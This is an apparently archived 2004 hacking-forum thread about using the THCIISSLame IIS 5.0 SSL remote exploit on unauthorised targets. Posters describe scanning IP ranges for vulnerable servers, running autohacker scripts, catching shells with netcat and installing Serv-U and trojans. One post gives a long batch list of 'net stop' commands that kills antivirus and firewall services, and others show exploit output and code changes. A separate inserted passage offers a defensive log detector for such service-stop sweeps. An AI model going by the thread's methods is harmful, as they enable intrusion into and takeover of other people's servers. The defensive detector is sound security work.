Full Version: Iis5 Ssl V0.2
michael
seems that the main problem now is that people can't connect to Serv-U once they started it

anyone with answers here on what to do??
eXist
Well I'm guessing the system has a firewall installed on there and/or there is an IP filter active. Make sure you have actually started it.
If you really want to you could find out what AV software is running and kill it so you can start your all important server.
phoney
Which CBPort is the best to forward on routers?
michael
QUOTE (rvd @ Apr 24 2004, 05:39 PM)
Haven't got any shells so far, maybe i have just bad luck or am i doing something wrong. I'll tell you what i did:

- I compiled the code with Dev-C++ with the mod of Ecko, thank you for that.
- I made a little autohacker in a .bat file, nothing special.
- Then i started scanning with a modified version of sfind; i scanned on port 443 at a german range.
- After the scanning i did a banner scan on the results of the port scan (did it with Scanline: command sl -bhpt 80 -f input.txt -o output.txt).
- Filtered the banner scan and took every ip where the banner scan said: Microsoft-IIS/5.0
- Then i put the ips in a txt file and executed the autohacker.

How did u filter that banner scan...u got a prog for it?
Meteor
For all that can't start servu, or any trojan or anything else: did you stop all AV? cause i see "Network Associates McShield" in the list of service names of realloader!
I managed to start a trojan or backdoor without any problem!
michael
how did u manage that....i'd like to know
Meteor
just stop AV and start the app you want, i don't understand what is the problem!
net stop "AV service name"
blabla.exe
in the shell!
tte
QUOTE (Meteor @ Apr 25 2004, 10:56 AM)
just stop AV and start the app you want, i don't understand what is the problem!
net stop "AV service name"
blabla.exe
in the shell!

you got a list of AV service names?
arn0ld
tte there u go, just make a .bat out of it:
(just searched in the forum)

CODE

net stop ACKWIN32
net stop ADVXDWIN
net stop ALERTSVC
net stop ALOGSERV
net stop AMON9X
net stop ANTI-TROJAN
net stop ANTS
net stop apvxdwin
net stop ATCON
net stop ATUPDATER
net stop ATWATCH
net stop AUTODOWN
net stop AutoTrace
net stop AVCONSOL
net stop AVGCC32
net stop AVGCTRL
net stop Avgctrl
net stop AVGSERV
net stop AvgServ
net stop AVGSERV9
net stop AVGW
net stop avkpop
net stop AVKSERV
net stop avkservice
net stop avkwctl9
net stop AVP32
net stop AVP32
net stop AVPCC
net stop AVPCC
net stop AVPM
net stop AVPM
net stop Avsched32
net stop AVSYNMGR
net stop AvSynMgr
net stop AVWINNT
net stop AVXMONITOR9X
net stop AVXMONITORNT
net stop AVXQUAR
net stop AVXW
net stop BLACKD
net stop BLACKICE
net stop BlackICE
net stop CLAW95
net stop CLAW95CF
net stop CLEANER
net stop CLEANER3
net stop CMGRDIAN
net stop CONNECTIONMONITOR
net stop defscangui
net stop DEFWATCH
net stop DOORS
net stop DVP95
net stop EFPEADM
net stop ETRUSTCIPE
net stop EVPN
net stop EXPERT
net stop fameh32
net stop fch32
net stop fih32
net stop fnrb32
net stop fsaa
net stop fsav32
net stop fsgk32
net stop fsm32
net stop fsma32
net stop fsmb32
net stop gbmenu
net stop GENERICS
net stop GUARD
net stop GUARDDOG
net stop HELP
net stop IAMAPP
net stop IAMSERV
net stop ICLOAD95
net stop ICLOADNT
net stop ICMON
net stop ICSUPP95
net stop ICSUPPNT
net stop IFACE
net stop IOMON98
net stop ISRV95
net stop JEDI
net stop LDNETMON
net stop LDPROMENU
net stop LDSCAN
net stop LOCKDOWN
net stop LOCKDOWN2000
net stop LUALL
net stop LUCOMSERVER
net stop MCAGENT
net stop MCMNHDLR
net stop MCSHIELD
net stop McShield
net stop MCTOOL
net stop MCUPDATE
net stop MCVSRTE
net stop MCVSSHLD
net stop MGAVRTCL
net stop MGAVRTE
net stop MGHTML
net stop minilog
net stop MONITOR
net stop MOOLIVE
net stop MWATCH
net stop NAVAP
net stop navapsvc
net stop NAVAPW32
net stop NAVENG
net stop NAVEX15
net stop NAVLU32
net stop NAVW32
net stop NAVWNT
net stop NDD32
net stop NeoWatchLog
net stop NETUTILS
net stop ngdbserv
net stop NGServer
net stop NISSERV
net stop NISSERV
net stop NISUM
net stop NISUM
net stop NMAIN
net stop NORMIST
net stop NPROTECT
net stop NPSSVC
net stop NSCHED32
net stop ntrtscan
net stop NTVDM
net stop NTXconfig
net stop NVC95
net stop NVSVC32
net stop NWService
net stop NWTOOL16
net stop PADMIN
net stop pavproxy
net stop PCCIOMON
net stop pccntmon
net stop pccwin97
net stop PCCWIN98
net stop pcscan
net stop PERSFW
net stop POP3TRAP
net stop POPROXY
net stop PORTMONITOR
net stop PROCESSMONITOR
net stop PROGRAMAUDITOR
net stop PROT95
net stop PVIEW95
net stop RAV7
net stop RAV7WIN
net stop REALMON
net stop RESCUE
net stop RTVSCN95
net stop sbserv
net stop SCAN32
net stop SCRSCAN
net stop sharedaccess
net stop SPHINX
net stop SPYXX
net stop SS3EDIT
net stop STOPW
net stop SVW3
net stop SWEEP95
net stop SweepNet
net stop SWEEPSRV
net stop SWEEPSRV.SYS
net stop SweepUpdate
net stop SWNETSUP
net stop SymProxySvc
net stop SYMTRAY
net stop TFAK
net stop vbcmserv
net stop VbCons
net stop VET32
net stop VET95
net stop VETTRAY
net stop VPC32
net stop VPTRAY
net stop VSCHED
net stop VSECOMR
net stop VSHWIN32
net stop VSMAIN
net stop vsmon
net stop VSMON
net stop VSSTAT
net stop WATCHDOG
net stop WEBSCANX
net stop WGFE95
net stop WIMMUN32
net stop WRADMIN
net stop WRCTRL
net stop ZAPROMINILOG
net stop ZONEALARM
Meteor
simply by typing "net start" and u will see all services on the remote machine that have been started
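The defender's side of the same mechanism, added here as an example and not part of the thread: a scripted "net stop" sweep like the list above leaves a burst of Service Control Manager event 7036 ("entered the stopped state") entries in the Windows System log within a few seconds of each other. The log lines below are constructed in a simplified export format, and the service names are taken from the list posted in this thread.

```python
import re
from datetime import datetime, timedelta

# Names taken from the "net stop" list posted above (lower-cased); a real
# deployment would use the service names of its own endpoint protection.
SECURITY_SERVICES = {"mcshield", "navapsvc", "vsmon", "zonealarm",
                     "blackice", "sharedaccess", "defwatch", "ntrtscan"}

# Constructed sample: System log Event ID 7036 lines exported as text
# ("The <name> service entered the <state> state."), simplified format.
SAMPLE_LOG = """\
2004-04-25 10:55:58 7036 The Print Spooler service entered the stopped state.
2004-04-25 10:56:01 7036 The McShield service entered the stopped state.
2004-04-25 10:56:02 7036 The navapsvc service entered the stopped state.
2004-04-25 10:56:02 7036 The vsmon service entered the stopped state.
2004-04-25 10:56:03 7036 The BlackICE service entered the running state.
2004-04-25 10:56:04 7036 The sharedaccess service entered the stopped state.
2004-04-25 11:30:00 7036 The McShield service entered the stopped state.
"""

STOP_RE = re.compile(
    r"^(\S+ \S+) 7036 The (.+?) service entered the stopped state\.$")

def parse_stops(text):
    """Return (timestamp, service) for every 7036 'stopped' line."""
    stops = []
    for line in text.splitlines():
        m = STOP_RE.match(line)
        if m:
            stops.append((datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
                          m.group(2)))
    return stops

def find_stop_bursts(text, window=timedelta(seconds=60), threshold=3):
    """Report non-overlapping windows in which at least `threshold`
    security services stopped within `window` of the first stop.  A
    scripted sweep produces this; a manual stop touches one service."""
    events = [(t, s) for t, s in parse_stops(text)
              if s.lower() in SECURITY_SERVICES]
    bursts, i = [], 0
    while i < len(events):
        start = events[i][0]
        names = [s for t, s in events[i:] if t - start <= window]
        if len(names) >= threshold:
            bursts.append((start, names))
            i += len(names)  # resume after the services already reported
        else:
            i += 1
    return bursts
```

The lone McShield stop at 11:30 is not reported, so a single manual stop does not trigger the rule; the four stops between 10:56:01 and 10:56:04 do.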
Silent Bob
oh dear, idiots, come on think about it (oh yeah, when you make that bat some AVs will call it a virus anyway)
thanks for the code, gonna give it a test
ind0r
when i get a shell, after about 60 seconds I get disconnected. could anyone help?
'net user' didn't work, I get an error with rpc.
jpno5
bloody n00bs, use the new perl script
Meteor
yes the new perl script might be good but doesn't work for me ^^
if "net user" doesn't work... nothing with the net command can be done i think, so try another ip
DarkAngel52457
Then give us the link to the new perl exploit. i have tested it with a lot of things and can not connect to serv-u

guufa
QUOTE
C:\SSL-IIS>Lame.exe 141.213.165.249 82.64.177.135 3245

THCIISSLame v0.2 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

[*] modded version by Ecko --> greetz to FireBlade, XeroX [*])

[*] Buffer is loading
[*] trying to get a connection...
[*] send Exploit
bind error() 10048


With your Auto Haxor Gui G777, I have this error without netcat opened.
Problem or bad target?
Ecko
yo guufa...you NEED NETCAT...without it it wouldn't work...the bind error is the reason
DarkAngel52457
this tool works fine, i have many shells; you ignore the button nc

the prob is: you upload your serv-u and start this, then you will connect with flashfxp and you can not connect

guufa
With netcat or without netcat it's the same: bind error.

How can I fix it?
porc1978
QUOTE (guufa @ Apr 25 2004, 01:47 PM)
With netcat or without netcat it's the same: bind error.

How can I fix it?

I've got the same problem but only with nc opened (the port is 3245)...anyone has an idea about it?
Meteor
you don't need netcat; if netcat listens on port 444 and you choose 444 for the bind port, it causes a bind error in the sploit
Ecko
hm...i've also got NO problems with it...I use old ntpw servers and store their netcat on port 1199...i control them via telnet...no probs
michael
thx to all of u, i got this 1 figured out
many thanks
saendler
@g777 nice gui method...thx a lot....
mighty_falcon
hmmm has this exploit worked for anyone yet? like getting a real shell on the remote computer?

i have tried it a few times but i get timed out, could not attack server
Qlimax
i tried 2 hack with the autohacker of G777 on a big list and everybody is:
CODE

[*] Buffer is loading
[*] trying to get a connection...
[*] send Exploit
[*] Warte auf ankommende shell
[*] Server couldn't be attacked - Timeout!
mighty_falcon
QUOTE (Qlimax @ Apr 25 2004, 05:18 PM)
i try 2 hack with the autohacker of G777 big list and everybody is:
CODE

[*] Buffer is loading
[*] trying to get a connection...
[*] send Exploit
[*] Warte auf ankommende shell
[*] Server couldn't be attacked - Timeout!

yep, I'm getting the same, think almost everyone is patched by now
Krogoth
the chances of getting a shell are like 1 out of 500.
i'm using both ver 0.1 and 0.2. all i can say is, most are firewalled or patched if you don't get any shell.

g777: thanks for the nice gui
i'll experiment with it when i have free time.
HAnzsz
w0000t

getting shells 1 outta 5

just bannerscan your port 443 results on english ranges
"microsoft iis 5.0"

it PWnz
thx
Ecko
but with which tool do you scan for banners?? plz share
fre4k
Hi...

do the bannerscan with scanline.

http://www.foundstone.com/resources/termso...e.zip&warn=true

or just do a port scan (443) and check the results with xscan v.3.1 and the msiis nasl script...

so long

greetings

fre4k
totof
there is scanline.exe
mighty_falcon
sorry for this noobish question but every time i use scanline to check ips from a list with the following command

QUOTE
sl -b 443 -f scan.txt

it just scans my local network

any ideas on what im doing wrong?

tnx
Ecko
it didn't work for me either...i don't know why it found nothing...
Unio
QUOTE (mighty_falcon)
sorry for this noobish question but every time i use scanline to check ips from a list with the following command

QUOTE
sl -b 443 -f scan.txt

it just scans my local network

any ideas on what im doing wrong?

tnx

try

CODE
sl -bhpt 443 -f scan.txt

arn0ld
sl -bhpt 80 -f ips.txt -o results.txt
totof
sl -bhpt 80,443 -f ips.txt -o results.txt
mighty_falcon
**** No valid IP addresses provided
**** Using localhost "*****" (192.1**.*.**) instead

same as before, all my ips in scan.txt are in a list format like below

123.1.1.1.1
23.45.6.67.6
2.3.45.5

are they supposed to be listed differently?

tnx
dmg
QUOTE (mighty_falcon @ Apr 25 2004, 08:09 PM)
**** No valid IP addresses provided
**** Using localhost "*****" (192.1**.*.**) instead

same as before, all my ips in scan.txt are in a list format like below

123.1.1.1.1
23.45.6.67.6
2.3.45.5

are they supposed to be listed differently?

tnx

The first two ip addresses have 5 octets..... What do you think?
mighty_falcon
QUOTE (dmg @ Apr 25 2004, 09:42 PM)
QUOTE (mighty_falcon @ Apr 25 2004, 08:09 PM)
**** No valid IP addresses provided
**** Using localhost "*****" (192.1**.*.**) instead

same as before, all my ips in scan.txt are in a list format like below

123.1.1.1.1
23.45.6.67.6
2.3.45.5

are they supposed to be listed differently?

tnx

The first two ip addresses have 5 octets..... What do you think?

lol no that was just an example m8

the real list is smth like this

QUOTE

128.3.1.72
128.3.2.48
128.3.90.1
128.3.95.1
128.4.10.245
128.4.22.61
128.4.40.10
128.4.50.10
128.4.51.10
HAnzsz
foolish mortals,

you people should study a thing or two about hardware routers!

if you don't understand what this ip means: 192.168.*
then you should give up this "local" scriptkiddying b/c you're just too shitlame for this.

a tip for those who are trying so hard and can't do it by themselves:
"ipconfig" in DOS

check for ip
is it a network ip?
is it a software routed ip?
is it an inet direct accessible ip?

allrighty lets get to w0rk!
touk
QUOTE (Ecko @ Apr 24 2004, 03:51 PM)
@dEuS

only search in the source code for:

CODE

printf("[*] waiting for shell\n");


put the following code 1 line under that!

CODE

Sleep(6000);
printf("[*] exploit didn't w0rk - timeout!\n\n");
printf("[*][*][*] modded by Ecko [*][*][*]\n");
exit(-1);

Lol! It can't work. With a Sleep(6000) you will ALWAYS get printf("[*] exploit didn't w0rk - timeout!\n\n");

If u want to do something like this u have to initiate a process that will watch the mother process and kill it after some milliseconds of inactivity.
Lanig
what i did to prevent the timeout is simply remove the part where it creates a listening socket and just jump to sending the shellcode and printing "waiting for shell" for a couple of seconds
in the meantime i have another netcat window that gets the shell... more useful for autohacking
Ecko
that's right, you will always get the "timeout". But it mustn't be a timeout: if it works you should get a shell! just watch your netcat
onurize
bind_error, help me plZ!
polpotx
I've tried to compile this myself ... but i got this error:

QUOTE
(18) : fatal error C1083: Cannot open include file: 'winsock2.h': No such file or directory

I am using Microsoft Visual C++ Toolkit. Can someone advise me about this? Why didn't the compiler find winsock2.h? Where can i get it from?

Best regards
Ecko
@onurize

means your netcat doesn't work!

@polpotx

you should compile it with visual c++ enterprise (get it with kazaa) (i did it too, successfully compiled with it)

hope this could help

peaz
onurize
@ecko but it must work, i use the autohaxor with netcat... but i scanned 1000 IPs, no shell

can you help me plz? over ICQ or Email or something?
Ecko
ok onurize pmed you
jak3c
very good exploit...!
thank you for sharing your code ...
i will test it if i have some time!